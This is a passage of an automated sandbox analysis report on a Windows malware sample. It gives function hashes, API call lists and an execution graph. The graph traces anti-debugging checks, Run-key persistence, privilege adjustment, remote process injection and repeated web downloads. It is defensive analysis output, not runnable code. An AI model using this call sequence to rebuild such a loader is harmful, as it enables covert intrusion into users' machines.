                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                        • API String ID: 779948276-1428018034
                                                                                                                                                                                                                        • Opcode ID: 1d2af400ed1d53b821f5eb59e2e4f5bf11a65c77a1e5104fedf3b789aa3a2d8d
                                                                                                                                                                                                                        • Instruction ID: d0ab19dc095c2e2ee652391215f25f4d87bae92af8b6a6eb246cd33093bec386
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d2af400ed1d53b821f5eb59e2e4f5bf11a65c77a1e5104fedf3b789aa3a2d8d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A112136528B4086DB908B14F54476B7BA4FB847A0F105235F9AE83BE8DF7DD146CB04
                                                                                                                                                                                                                        Function 00007FF6EC841088 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: GetThreadId$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-2383230424
                                                                                                                                                                                                                        • Opcode ID: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction ID: d8a8707037e08fb5cf08d690587cc28aa04cb35a63961b93133711a4397e9681
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 41E01236918A83C2D624DB10F94832E67A4FB84745F900132E58E82A64EF3DD54ACB09
                                                                                                                                                                                                                        Function 00007FF6EC842F2C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC8438CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC8438E2
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC8438F5
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843905
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843918
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC84392D
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843940
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843955
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC844524: CreateFileW.KERNEL32 ref: 00007FF6EC84456B
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC8410D8: OpenProcess.KERNEL32 ref: 00007FF6EC8410FC
                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32 ref: 00007FF6EC842FC7
                                                                                                                                                                                                                        • HeapFree.KERNEL32 ref: 00007FF6EC842FDA
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$CreateFileHeapProcess$AttributesDirectoryFolderFreeOpenPath
                                                                                                                                                                                                                        • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                        • API String ID: 1115570603-2286007224
                                                                                                                                                                                                                        • Opcode ID: 15d6fefc82c0193e12c752cbc5a593e68fb1e92f3234a397ae1e8610d6d43279
                                                                                                                                                                                                                        • Instruction ID: 6c0365e93915bac776bb99cc403a5b5f0a33cec03175acaffb630966fa009e83
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15d6fefc82c0193e12c752cbc5a593e68fb1e92f3234a397ae1e8610d6d43279
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0011EC32A18B8285E750EB10FA493AB7BA8FB84744F400535D54CC2665DF3EE446CB4A

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:23.7%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                        Total number of Nodes:475
                                                                                                                                                                                                                        Total number of Limit Nodes:4
                                                                                                                                                                                                                        execution_graph 1454 7ff6345c2160 1455 7ff6345c218a InternetOpenW 1454->1455 1456 7ff6345c21c4 InternetOpenUrlW 1455->1456 1457 7ff6345c21b7 Sleep 1455->1457 1458 7ff6345c224d HttpQueryInfoA 1456->1458 1459 7ff6345c21fb InternetOpenUrlW 1456->1459 1457->1455 1460 7ff6345c22a2 1458->1460 1461 7ff6345c227c InternetCloseHandle InternetCloseHandle Sleep 1458->1461 1459->1458 1462 7ff6345c2232 InternetCloseHandle Sleep 1459->1462 1463 7ff6345c2309 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1460->1463 1464 7ff6345c22ac InternetCloseHandle InternetOpenUrlW 1460->1464 1461->1455 1462->1455 1466 7ff6345c236e InternetCloseHandle InternetCloseHandle 1463->1466 1467 7ff6345c2388 1463->1467 1464->1463 1465 7ff6345c22ee InternetCloseHandle Sleep 1464->1465 1465->1455 1468 7ff6345c2407 1466->1468 1469 7ff6345c2390 InternetReadFile 1467->1469 1470 7ff6345c23de InternetCloseHandle InternetCloseHandle 1467->1470 1469->1467 1469->1470 1470->1468 1452 7ff6345c1088 GetModuleHandleA GetProcAddress 1453 7ff6345c10bb 1452->1453 853 7ff6345c340c 913 7ff6345c153c 853->913 858 7ff6345c3424 ExitProcess 859 7ff6345c342c 1147 7ff6345c40a4 GetCurrentProcess OpenProcessToken 859->1147 863 7ff6345c3447 864 7ff6345c345c 863->864 865 7ff6345c34ab 863->865 866 7ff6345c41e4 3 API calls 864->866 868 7ff6345c34c0 865->868 869 7ff6345c34fc 865->869 867 7ff6345c3468 866->867 870 7ff6345c346f 867->870 871 7ff6345c3482 ExitProcess 867->871 1162 7ff6345c41e4 CreateMutexExA 868->1162 879 7ff6345c3511 869->879 880 7ff6345c3552 869->880 873 7ff6345c41e4 3 API calls 870->873 875 7ff6345c347b 873->875 875->871 878 7ff6345c348a 875->878 876 7ff6345c34d3 ExitProcess 877 7ff6345c34db 1175 7ff6345c320c 877->1175 1166 7ff6345c329c 878->1166 884 7ff6345c41e4 3 API calls 879->884 1180 7ff6345c3a34 880->1180 885 7ff6345c351d 884->885 889 7ff6345c3524 ExitProcess 885->889 890 7ff6345c352c 885->890 886 7ff6345c34e0 891 7ff6345c34f4 ExitProcess 886->891 892 7ff6345c34e7 Sleep 886->892 887 7ff6345c3557 1186 7ff6345c339c GetVersionExW 887->1186 888 7ff6345c348f 894 7ff6345c34a3 ExitProcess 888->894 895 7ff6345c3496 Sleep 888->895 896 7ff6345c320c 19 API calls 890->896 892->886 895->888 898 7ff6345c3531 896->898 901 7ff6345c3545 ExitProcess 898->901 902 7ff6345c3538 Sleep 898->902 899 7ff6345c35be CreateThread CreateThread CreateThread WaitForMultipleObjects ExitProcess 900 7ff6345c356a 903 7ff6345c41e4 3 API calls 900->903 902->898 904 7ff6345c3576 903->904 905 7ff6345c3590 ExitProcess 904->905 906 7ff6345c41e4 3 API calls 904->906 907 7ff6345c3589 906->907 907->905 908 7ff6345c3598 907->908 909 7ff6345c329c 42 API calls 908->909 910 7ff6345c359d 909->910 911 7ff6345c35b1 ExitProcess 910->911 912 7ff6345c35a4 Sleep 910->912 912->910 1188 7ff6345c149c LoadLibraryA GetProcAddress 913->1188 915 7ff6345c15bd 1189 7ff6345c149c LoadLibraryA GetProcAddress 915->1189 917 7ff6345c15d7 1190 7ff6345c14ec LoadLibraryA GetProcAddress 917->1190 919 7ff6345c15f1 1191 7ff6345c14ec LoadLibraryA GetProcAddress 919->1191 921 7ff6345c160b 1192 7ff6345c14ec LoadLibraryA GetProcAddress 921->1192 923 7ff6345c1625 1193 7ff6345c14ec LoadLibraryA GetProcAddress 923->1193 925 7ff6345c163f 1194 7ff6345c14ec LoadLibraryA GetProcAddress 925->1194 927 7ff6345c1659 1195 7ff6345c14ec LoadLibraryA GetProcAddress 927->1195 929 7ff6345c1673 1196 7ff6345c14ec LoadLibraryA GetProcAddress 929->1196 931 7ff6345c168d 1197 7ff6345c14ec LoadLibraryA GetProcAddress 931->1197 933 7ff6345c16a7 1198 7ff6345c14ec LoadLibraryA GetProcAddress 933->1198 935 7ff6345c16c1 1199 7ff6345c149c LoadLibraryA GetProcAddress 935->1199 937 7ff6345c16db 1200 7ff6345c149c LoadLibraryA GetProcAddress 937->1200 939 7ff6345c16f5 1201 7ff6345c149c LoadLibraryA GetProcAddress 939->1201 941 7ff6345c170f 1202 7ff6345c149c LoadLibraryA GetProcAddress 941->1202 943 7ff6345c1729 1203 7ff6345c14ec LoadLibraryA GetProcAddress 943->1203 945 7ff6345c1743 1204 7ff6345c14ec LoadLibraryA GetProcAddress 945->1204 947 7ff6345c175d 1205 7ff6345c14ec LoadLibraryA GetProcAddress 947->1205 949 7ff6345c1777 1206 7ff6345c14ec LoadLibraryA GetProcAddress 949->1206 951 7ff6345c1791 1207 7ff6345c14ec LoadLibraryA GetProcAddress 951->1207 953 7ff6345c17ab 1208 7ff6345c14ec LoadLibraryA GetProcAddress 953->1208 955 7ff6345c17c5 1209 7ff6345c14ec LoadLibraryA GetProcAddress 955->1209 957 7ff6345c17df 1210 7ff6345c14ec LoadLibraryA GetProcAddress 957->1210 959 7ff6345c17f9 1211 7ff6345c14ec LoadLibraryA GetProcAddress 959->1211 961 7ff6345c1813 1212 7ff6345c14ec LoadLibraryA GetProcAddress 961->1212 963 7ff6345c182d 1213 7ff6345c14ec LoadLibraryA GetProcAddress 963->1213 965 7ff6345c1847 1214 7ff6345c14ec LoadLibraryA GetProcAddress 965->1214 967 7ff6345c1861 1215 7ff6345c14ec LoadLibraryA GetProcAddress 967->1215 969 7ff6345c187b 1216 7ff6345c14ec LoadLibraryA GetProcAddress 969->1216 971 7ff6345c1895 1217 7ff6345c14ec LoadLibraryA GetProcAddress 971->1217 973 7ff6345c18af 1218 7ff6345c14ec LoadLibraryA GetProcAddress 973->1218 975 7ff6345c18c9 1219 7ff6345c14ec LoadLibraryA GetProcAddress 975->1219 977 7ff6345c18e3 1220 7ff6345c14ec LoadLibraryA GetProcAddress 977->1220 979 7ff6345c18fd 1221 7ff6345c14ec LoadLibraryA GetProcAddress 979->1221 981 7ff6345c1917 1222 7ff6345c14ec LoadLibraryA GetProcAddress 981->1222 983 7ff6345c1931 1223 7ff6345c14ec LoadLibraryA GetProcAddress 983->1223 985 7ff6345c194b 1224 7ff6345c14ec LoadLibraryA GetProcAddress 985->1224 987 7ff6345c1965 1225 7ff6345c14ec LoadLibraryA GetProcAddress 987->1225 989 7ff6345c197f 1226 7ff6345c14ec LoadLibraryA GetProcAddress 989->1226 991 7ff6345c1999 1227 7ff6345c14ec LoadLibraryA GetProcAddress 991->1227 993 7ff6345c19b3 1228 7ff6345c14ec LoadLibraryA GetProcAddress 993->1228 995 7ff6345c19cd 1229 7ff6345c14ec LoadLibraryA GetProcAddress 995->1229 997 7ff6345c19e7 1230 7ff6345c14ec LoadLibraryA GetProcAddress 997->1230 999 7ff6345c1a01 1231 7ff6345c14ec LoadLibraryA GetProcAddress 999->1231 1001 7ff6345c1a1b 1232 7ff6345c14ec LoadLibraryA GetProcAddress 1001->1232 1003 7ff6345c1a35 1233 7ff6345c14ec LoadLibraryA GetProcAddress 1003->1233 1005 7ff6345c1a4f 1234 7ff6345c14ec LoadLibraryA GetProcAddress 1005->1234 1007 7ff6345c1a69 1235 7ff6345c14ec LoadLibraryA GetProcAddress 1007->1235 1009 7ff6345c1a83 1236 7ff6345c14ec LoadLibraryA GetProcAddress 1009->1236 1011 7ff6345c1a9d 1237 7ff6345c14ec LoadLibraryA GetProcAddress 1011->1237 1013 7ff6345c1ab7 1238 7ff6345c14ec LoadLibraryA GetProcAddress 1013->1238 1015 7ff6345c1ad1 1239 7ff6345c14ec LoadLibraryA GetProcAddress 1015->1239 1017 7ff6345c1aeb 1240 7ff6345c14ec LoadLibraryA GetProcAddress 1017->1240 1019 7ff6345c1b05 1241 7ff6345c14ec LoadLibraryA GetProcAddress 1019->1241 1021 7ff6345c1b1f 1242 7ff6345c14ec LoadLibraryA GetProcAddress 1021->1242 1023 7ff6345c1b39 1243 7ff6345c14ec LoadLibraryA GetProcAddress 1023->1243 1025 7ff6345c1b53 1244 7ff6345c14ec LoadLibraryA GetProcAddress 1025->1244 1027 7ff6345c1b6d 1245 7ff6345c14ec LoadLibraryA GetProcAddress 1027->1245 1029 7ff6345c1b87 1246 7ff6345c14ec LoadLibraryA GetProcAddress 1029->1246 1031 7ff6345c1ba1 1247 7ff6345c14ec LoadLibraryA GetProcAddress 1031->1247 1033 7ff6345c1bbb 1248 7ff6345c14ec LoadLibraryA GetProcAddress 1033->1248 1035 7ff6345c1bd5 1249 7ff6345c14ec LoadLibraryA GetProcAddress 1035->1249 1037 7ff6345c1bef 1250 7ff6345c14ec LoadLibraryA GetProcAddress 1037->1250 1039 7ff6345c1c09 1251 7ff6345c14ec LoadLibraryA GetProcAddress 1039->1251 1041 7ff6345c1c23 1252 7ff6345c14ec LoadLibraryA GetProcAddress 1041->1252 1043 7ff6345c1c3d 1253 7ff6345c14ec LoadLibraryA GetProcAddress 1043->1253 1045 7ff6345c1c57 1254 7ff6345c14ec LoadLibraryA GetProcAddress 1045->1254 1047 7ff6345c1c71 1255 7ff6345c14ec LoadLibraryA GetProcAddress 1047->1255 1049 7ff6345c1c8b 1256 7ff6345c14ec LoadLibraryA GetProcAddress 1049->1256 1051 7ff6345c1ca5 1257 7ff6345c14ec LoadLibraryA GetProcAddress 1051->1257 1053 7ff6345c1cbf 1258 7ff6345c14ec LoadLibraryA GetProcAddress 1053->1258 1055 7ff6345c1cd9 1259 7ff6345c14ec LoadLibraryA GetProcAddress 1055->1259 1057 7ff6345c1cf3 1260 7ff6345c14ec LoadLibraryA GetProcAddress 1057->1260 1059 7ff6345c1d0d 1261 7ff6345c14ec LoadLibraryA GetProcAddress 1059->1261 1061 7ff6345c1d27 1262 7ff6345c14ec LoadLibraryA GetProcAddress 1061->1262 1063 7ff6345c1d41 1263 7ff6345c14ec LoadLibraryA GetProcAddress 1063->1263 1065 7ff6345c1d5b 1264 7ff6345c14ec LoadLibraryA GetProcAddress 1065->1264 1067 7ff6345c1d75 1265 7ff6345c14ec LoadLibraryA GetProcAddress 1067->1265 1069 7ff6345c1d8f 1266 7ff6345c14ec LoadLibraryA GetProcAddress 1069->1266 1071 7ff6345c1da9 1267 7ff6345c14ec LoadLibraryA GetProcAddress 1071->1267 1073 7ff6345c1dc3 1268 7ff6345c14ec LoadLibraryA GetProcAddress 1073->1268 1075 7ff6345c1ddd 1269 7ff6345c14ec LoadLibraryA GetProcAddress 1075->1269 1077 7ff6345c1df7 1270 7ff6345c14ec LoadLibraryA GetProcAddress 1077->1270 1079 7ff6345c1e11 1271 7ff6345c14ec LoadLibraryA GetProcAddress 1079->1271 1081 7ff6345c1e2b 1272 7ff6345c14ec LoadLibraryA GetProcAddress 1081->1272 1083 7ff6345c1e45 1273 7ff6345c14ec LoadLibraryA GetProcAddress 1083->1273 1085 7ff6345c1e5f 1274 7ff6345c14ec LoadLibraryA GetProcAddress 1085->1274 1087 7ff6345c1e79 1275 7ff6345c14ec LoadLibraryA GetProcAddress 1087->1275 1089 7ff6345c1e93 1276 7ff6345c14ec LoadLibraryA GetProcAddress 1089->1276 1091 7ff6345c1ead 1277 7ff6345c14ec LoadLibraryA GetProcAddress 1091->1277 1093 7ff6345c1ec7 1278 7ff6345c14ec LoadLibraryA GetProcAddress 1093->1278 1095 7ff6345c1ee1 1279 7ff6345c14ec LoadLibraryA GetProcAddress 1095->1279 1097 7ff6345c1efb 1280 7ff6345c14ec LoadLibraryA GetProcAddress 1097->1280 1099 7ff6345c1f15 1281 7ff6345c14ec LoadLibraryA GetProcAddress 1099->1281 1101 7ff6345c1f2f 1282 7ff6345c14ec LoadLibraryA GetProcAddress 1101->1282 1103 7ff6345c1f49 1283 7ff6345c14ec LoadLibraryA GetProcAddress 1103->1283 1105 7ff6345c1f63 1284 7ff6345c14ec LoadLibraryA GetProcAddress 1105->1284 1107 7ff6345c1f7d 1285 7ff6345c14ec LoadLibraryA GetProcAddress 1107->1285 1109 7ff6345c1f97 1286 7ff6345c14ec LoadLibraryA GetProcAddress 1109->1286 1111 7ff6345c1fb1 1287 7ff6345c149c LoadLibraryA GetProcAddress 1111->1287 1113 7ff6345c1fcb 1288 7ff6345c14ec LoadLibraryA GetProcAddress 1113->1288 1115 7ff6345c1fe5 1289 7ff6345c14ec LoadLibraryA GetProcAddress 1115->1289 1117 7ff6345c1fff 1290 7ff6345c14ec LoadLibraryA GetProcAddress 1117->1290 1119 7ff6345c2019 1291 7ff6345c14ec LoadLibraryA GetProcAddress 1119->1291 1121 7ff6345c2033 1292 7ff6345c14ec LoadLibraryA GetProcAddress 1121->1292 1123 7ff6345c204d 1293 7ff6345c14ec LoadLibraryA GetProcAddress 1123->1293 1125 7ff6345c2067 1294 7ff6345c14ec LoadLibraryA GetProcAddress 1125->1294 1127 7ff6345c2081 1295 7ff6345c149c LoadLibraryA GetProcAddress 1127->1295 1129 7ff6345c209b 1296 7ff6345c149c LoadLibraryA GetProcAddress 1129->1296 1131 7ff6345c20b5 1297 7ff6345c14ec LoadLibraryA GetProcAddress 1131->1297 1133 7ff6345c20cf 1298 7ff6345c14ec LoadLibraryA GetProcAddress 1133->1298 1135 7ff6345c20e9 1299 7ff6345c14ec LoadLibraryA GetProcAddress 1135->1299 1137 7ff6345c2103 1300 7ff6345c14ec LoadLibraryA GetProcAddress 1137->1300 1139 7ff6345c211d 1301 7ff6345c14ec LoadLibraryA GetProcAddress 1139->1301 1141 7ff6345c2137 1302 7ff6345c14ec LoadLibraryA GetProcAddress 1141->1302 1143 7ff6345c2151 1144 7ff6345c31ac IsDebuggerPresent 1143->1144 1145 7ff6345c31be GetCurrentProcess CheckRemoteDebuggerPresent 1144->1145 1146 7ff6345c31ba 1144->1146 1145->1146 1146->858 1146->859 1148 7ff6345c3431 1147->1148 1149 7ff6345c40ca GetTokenInformation 1147->1149 1158 7ff6345c3ca4 GetModuleFileNameW 1148->1158 1303 7ff6345c3b14 VirtualAlloc 1149->1303 1151 7ff6345c40fb GetTokenInformation 1152 7ff6345c4142 AdjustTokenPrivileges CloseHandle 1151->1152 1153 7ff6345c4128 CloseHandle 1151->1153 1304 7ff6345c3ae4 1152->1304 1154 7ff6345c3ae4 VirtualFree 1153->1154 1155 7ff6345c413d 1154->1155 1155->1148 1159 7ff6345c3ccf PathFindFileNameW wcslen 1158->1159 1160 7ff6345c3d92 wcsncpy 1158->1160 1161 7ff6345c3d09 1159->1161 1160->1161 1161->863 1163 7ff6345c4210 GetLastError 1162->1163 1164 7ff6345c34cc 1162->1164 1163->1164 1165 7ff6345c421d CloseHandle 1163->1165 1164->876 1164->877 1165->1164 1307 7ff6345c3884 1166->1307 1168 7ff6345c32ad 1311 7ff6345c4524 1168->1311 1170 7ff6345c3307 CreateThread 1170->888 1171 7ff6345c32c5 1171->1170 1324 7ff6345c4084 1171->1324 1176 7ff6345c3884 10 API calls 1175->1176 1177 7ff6345c321c 1176->1177 1359 7ff6345c42f4 1177->1359 1181 7ff6345c3704 3 API calls 1180->1181 1182 7ff6345c3a5f 1181->1182 1183 7ff6345c3884 10 API calls 1182->1183 1184 7ff6345c3a69 GetModuleFileNameW 1183->1184 1185 7ff6345c3a8a 1184->1185 1185->887 1187 7ff6345c33cd 1186->1187 1187->899 1187->900 1188->915 1189->917 1190->919 1191->921 1192->923 1193->925 1194->927 1195->929 1196->931 1197->933 1198->935 1199->937 1200->939 1201->941 1202->943 1203->945 1204->947 1205->949 1206->951 1207->953 1208->955 1209->957 1210->959 1211->961 1212->963 1213->965 1214->967 1215->969 1216->971 1217->973 1218->975 1219->977 1220->979 1221->981 1222->983 1223->985 1224->987 1225->989 1226->991 1227->993 1228->995 1229->997 1230->999 1231->1001 1232->1003 1233->1005 1234->1007 1235->1009 1236->1011 1237->1013 1238->1015 1239->1017 1240->1019 1241->1021 1242->1023 1243->1025 1244->1027 1245->1029 1246->1031 1247->1033 1248->1035 1249->1037 1250->1039 1251->1041 1252->1043 1253->1045 1254->1047 1255->1049 1256->1051 1257->1053 1258->1055 1259->1057 1260->1059 1261->1061 1262->1063 1263->1065 1264->1067 1265->1069 1266->1071 1267->1073 1268->1075 1269->1077 1270->1079 1271->1081 1272->1083 1273->1085 1274->1087 1275->1089 1276->1091 1277->1093 1278->1095 1279->1097 1280->1099 1281->1101 1282->1103 1283->1105 1284->1107 1285->1109 1286->1111 1287->1113 1288->1115 1289->1117 1290->1119 1291->1121 1292->1123 1293->1125 1294->1127 1295->1129 1296->1131 1297->1133 1298->1135 1299->1137 1300->1139 1301->1141 1302->1143 1303->1151 1305 7ff6345c3af5 VirtualFree 1304->1305 1306 7ff6345c3b08 1304->1306 1305->1306 1306->1148 1343 7ff6345c3704 GetWindowsDirectoryW 1307->1343 1309 7ff6345c38b3 SHGetFolderPathW lstrcatW lstrcatW CreateDirectoryW 1310 7ff6345c391e lstrcatW lstrcatW lstrcatW 1309->1310 1310->1168 1312 7ff6345c4571 1311->1312 1313 7ff6345c457e 1312->1313 1314 7ff6345c4585 GetFileSize GetProcessHeap RtlAllocateHeap 1312->1314 1313->1171 1315 7ff6345c45e0 ReadFile 1314->1315 1316 7ff6345c45ce CloseHandle 1314->1316 1317 7ff6345c462f 1315->1317 1318 7ff6345c4607 GetProcessHeap HeapFree CloseHandle 1315->1318 1316->1313 1319 7ff6345c4648 GetProcessHeap HeapFree CloseHandle 1317->1319 1321 7ff6345c4670 1317->1321 1318->1313 1319->1313 1320 7ff6345c47db GetProcessHeap HeapFree CloseHandle 1320->1313 1321->1320 1322 7ff6345c472b GetProcessHeap RtlAllocateHeap 1321->1322 1323 7ff6345c4774 1322->1323 1323->1320 1348 7ff6345c3fc4 CreateToolhelp32Snapshot 1324->1348 1327 7ff6345c10d8 OpenProcess 1328 7ff6345c111f 1327->1328 1333 7ff6345c1115 1327->1333 1355 7ff6345c13c4 GetModuleHandleA GetProcAddress 1328->1355 1330 7ff6345c112c 1331 7ff6345c11fe VirtualAllocEx 1330->1331 1330->1333 1332 7ff6345c124f WriteProcessMemory 1331->1332 1331->1333 1332->1333 1334 7ff6345c1286 WriteProcessMemory 1332->1334 1333->1170 1334->1333 1335 7ff6345c12d1 1334->1335 1357 7ff6345c1444 GetSystemInfo 1335->1357 1338 7ff6345c12fe GetModuleHandleA GetProcAddress 1338->1333 1340 7ff6345c1338 1338->1340 1339 7ff6345c1444 GetSystemInfo 1341 7ff6345c12f4 1339->1341 1340->1333 1342 7ff6345c1399 CloseHandle 1340->1342 1341->1338 1341->1342 1342->1333 1344 7ff6345c374e 1343->1344 1345 7ff6345c3758 GetVolumeInformationW 1343->1345 1344->1345 1346 7ff6345c37d4 1345->1346 1347 7ff6345c383e wsprintfW 1346->1347 1347->1309 1349 7ff6345c3fff Process32FirstW 1348->1349 1350 7ff6345c32f2 1348->1350 1351 7ff6345c401e wcscmp 1349->1351 1352 7ff6345c4059 CloseHandle 1349->1352 1350->1327 1353 7ff6345c4035 1351->1353 1354 7ff6345c4042 Process32NextW 1351->1354 1352->1350 1353->1352 1354->1351 1354->1352 1356 7ff6345c13ff 1355->1356 1356->1330 1358 7ff6345c12ea 1357->1358 1358->1338 1358->1339 1360 7ff6345c433d 1359->1360 1361 7ff6345c436b GetLastError 1360->1361 1362 7ff6345c434a 1360->1362 1364 7ff6345c322f CreateThread Sleep CreateThread 1361->1364 1366 7ff6345c4244 GetFileSize 1362->1366 1364->886 1371 7ff6345c3b14 VirtualAlloc 1366->1371 1368 7ff6345c4270 1369 7ff6345c42ba CloseHandle 1368->1369 1370 7ff6345c4284 SetFilePointer ReadFile 1368->1370 1369->1364 1370->1369 1371->1368 1372 7ff6345c2e9c CreateMutexA 1373 7ff6345c2ec1 ReleaseMutex CloseHandle 1372->1373 1374 7ff6345c2ede GetLastError 1372->1374 1375 7ff6345c2f20 1373->1375 1376 7ff6345c2f08 ReleaseMutex CloseHandle 1374->1376 1377 7ff6345c2eeb ReleaseMutex CloseHandle 1374->1377 1376->1375 1377->1375 1378 7ff6345c2f2c 1379 7ff6345c3884 10 API calls 1378->1379 1380 7ff6345c2f6b 1379->1380 1381 7ff6345c4524 16 API calls 1380->1381 1382 7ff6345c2f8f 1381->1382 1383 7ff6345c4084 5 API calls 1382->1383 1384 7ff6345c2fb2 1383->1384 1385 7ff6345c10d8 10 API calls 1384->1385 1386 7ff6345c2fc7 GetProcessHeap HeapFree 1385->1386 1387 7ff6345c337c 1390 7ff6345c24cc GetModuleFileNameW 1387->1390 1391 7ff6345c254d 1390->1391 1398 7ff6345c2548 1390->1398 1392 7ff6345c25a1 1391->1392 1393 7ff6345c258b 1391->1393 1433 7ff6345c240c ExpandEnvironmentStringsW 1392->1433 1394 7ff6345c25bf 1393->1394 1395 7ff6345c2595 1393->1395 1434 7ff6345c244c ExpandEnvironmentStringsW 1394->1434 1395->1398 1435 7ff6345c248c ExpandEnvironmentStringsW 1395->1435 1399 7ff6345c25b6 1399->1398 1401 7ff6345c2611 CreateProcessW 1399->1401 1401->1398 1402 7ff6345c266c 1401->1402 1402->1398 1403 7ff6345c26b3 GetFileSize 1402->1403 1404 7ff6345c26d1 1403->1404 1405 7ff6345c26db CloseHandle 1403->1405 1404->1405 1406 7ff6345c26eb VirtualAlloc 1404->1406 1405->1398 1407 7ff6345c2725 ReadFile 1406->1407 